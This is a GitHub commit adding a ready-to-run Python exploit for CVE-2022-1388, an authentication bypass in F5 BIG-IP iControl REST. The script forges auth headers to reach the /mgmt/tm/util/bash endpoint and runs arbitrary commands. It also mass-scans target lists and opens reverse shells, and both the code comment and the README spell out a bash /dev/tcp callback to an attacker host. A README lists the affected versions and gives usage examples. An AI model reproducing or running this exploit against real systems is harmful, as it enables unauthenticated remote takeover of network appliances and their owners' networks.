Add files via upload

Al1ex · May 9, 2022 · 41b77e1 · 41b77e1
1 parent cd3ad0b
commit 41b77e1
Show file tree

Hide file tree

Showing 10 changed files with 219 additions and 2 deletions.
diff --git a/CVE_2022_1388.py b/CVE_2022_1388.py
@@ -0,0 +1,146 @@
+import requests
+import json
+import sys
+import argparse
+import re
+import json
+import time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+t = int(time.time())
+
+def title():
+    print('''
+                 ## # # ###     ### ### ### ###      #  ### ### ### 
+                #   # # #         # # #   #   #     ##    # # # # # 
+                #   # # ##  ### ### # # ### ### ###  #   ## ### ### 
+                #   # # #       #   # # #   #        #    # # # # # 
+                 ##  #  ###     ### ### ### ###     ### ### ### ### 
+
+                                Author:Al1ex@Heptagram
+                                Github:https://github.com/Al1ex
+    ''')
+    print('''
+        验证模式：python CVE_2022_1388.py -v true -u target_url 
+        攻击模式：python CVE_2022_1388.py -a true -u target_url -c command 
+        批量检测：python CVE_2022_1388.py -s true -f file
+        反弹模式：python CVE_2022_1388.py -r true -u target_url -c command 
+        ''')
+
+def check(target_url):
+    check_url = target_url + '/mgmt/tm/util/bash'
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
+        'Content-Type': 'application/json',
+        'Connection': 'keep-alive, x-F5-Auth-Token',
+        'X-F5-Auth-Token': 'abc',
+        'Authorization': 'Basic YWRtaW46'
+    }
+    data = {'command': "run",'utilCmdArgs':"-c id"}
+    try:
+        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
+        if response.status_code == 200 and 'commandResult' in response.text:
+            print("[+] 目标 {} 存在漏洞".format(target_url))
+        else:
+            print("[-] 目标 {} 不存在漏洞".format(target_url))
+    except Exception as e:
+        print('url 访问异常 {0}'.format(target_url))
+
+def attack(target_url,cmd):
+    attack_url = target_url + '/mgmt/tm/util/bash'
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
+        'Content-Type': 'application/json',
+        'Connection': 'keep-alive, x-F5-Auth-Token',
+        'X-F5-Auth-Token': 'abc',
+        'Authorization': 'Basic YWRtaW46'
+    }
+
+    data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(cmd)}
+    try:
+        response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)
+        if response.status_code == 200 and 'commandResult' in response.text:
+            default = json.loads(response.text)
+            display = default['commandResult']
+            print("[+] 目标 {} 存在漏洞".format(target_url))
+            print('[+] 响应为:{0}'.format(display))
+        else:
+            print("[-] 目标 {} 不存在漏洞".format(target_url))  
+    except Exception as e:
+        print('url 访问异常 {0}'.format(target_url))
+
+def reverse_shell(target_url,command):
+    reverse_url = target_url + '/mgmt/tm/util/bash'
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
+        'Content-Type': 'application/json',
+        'Connection': 'keep-alive, x-F5-Auth-Token',
+        'X-F5-Auth-Token': 'abc',
+        'Authorization': 'Basic YWRtaW46'
+    }
+
+    data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(command)}
+    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
+    try:
+        requests.post(url=reverse_url, json=data, headers=headers, verify=False, timeout=5)
+    except Exception as e:
+        print("[+] 请自行查看是否反弹shell回来")
+
+def scan(file):
+    for url_link in open(file, 'r', encoding='utf-8'):
+            if url_link.strip() != '':
+                url_path = format_url(url_link.strip())
+                check(url_path)
+
+def format_url(url):
+    try:
+        if url[:4] != "http":
+            url = "https://" + url
+            url = url.strip()
+        return url
+    except Exception as e:
+        print('URL 错误 {0}'.format(url))
+
+
+def main():
+    parser = argparse.ArgumentParser("F5 Big-IP RCE")
+    parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ')
+    parser.add_argument('-u', '--url', type=str, help=' 目标URL ')
+
+    parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
+    parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
+
+    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
+    parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
+
+
+    parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ')
+    args = parser.parse_args()
+
+    verify_model = args.verify
+    url = args.url
+
+    attack_model = args.attack
+    command = args.command
+
+    scan_model = args.scan
+    file = args.file
+
+    shell_model = args.shell
+
+
+    if verify_model is True and url !=None:
+        check(url)
+    elif attack_model is True and url != None and command != None:
+        attack(url,command)
+    elif scan_model is True and file != None:
+        scan(file)
+    elif shell_model is True and url != None and command != None:
+        reverse_shell(url,command)
+    else:
+        sys.exit(0)     
+
+if __name__ == '__main__':
+    title()
+    main()
diff --git a/README.md b/README.md
@@ -1,2 +1,71 @@
-# CVE-2022-1388
-CVE-2022-1388 F5 BIG-IP iControl REST RCE
+## Vuln Impact
+
+This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. 
+
+## Vuln Product
+
+- F5 BIG-IQ 11.6.1 - 11.6.5
+- F5 BIG-IP 12.1.0 - 12.1.6
+- F5 BIG-IP 13.1.0 - 13.1.4
+- F5 BIG-IP 14.1.0 - 14.1.4
+- F5 BIG-IP 15.1.0 - 15.1.5
+- F5 BIG-IP 16.1.0 - 16.1.2
+
+## Vunl Check
+
+**Basic usage**
+
+```
+python3 CVE_2022_1388.py
+```
+
+![use](img/use.png)
+
+**Vuln check**
+
+```
+python3 CVE_2022_1388.py -v true -u https://192.168.17.200
+```
+
+![verify](img/verify.png)
+
+**command execute:**
+
+```
+python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id
+```
+
+![command_exec](img/exec.png)
+
+```
+python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami
+```
+
+![exec_2](img/exec_2.png)
+
+**batch scan**
+
+```
+python3 CVE_2022_1388.py -s true -f check.txt
+```
+
+![batch_scan](img/vul_scan.png)
+
+**Reserve Shell**
+
+```
+python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"
+```
+
+![reverse_shell](img/reverse_shell.png)
+
+![reverse_shell_ok](img/reverse_shell_ok.png)
+
+
+## Reference
+
+https://support.f5.com/csp/article/K23605346
+https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw
+https://github.com/clastix/capsule-proxy/issues/188
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
+https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr
diff --git a/check.txt b/check.txt
@@ -0,0 +1,2 @@
+https://192.168.17.199
+https://192.168.17.200
diff --git a/img/exec.png b/img/exec.png
diff --git a/img/exec_2.png b/img/exec_2.png
diff --git a/img/reverse_shell.png b/img/reverse_shell.png
diff --git a/img/reverse_shell_ok.png b/img/reverse_shell_ok.png
diff --git a/img/use.png b/img/use.png
diff --git a/img/verify.png b/img/verify.png
diff --git a/img/vul_scan.png b/img/vul_scan.png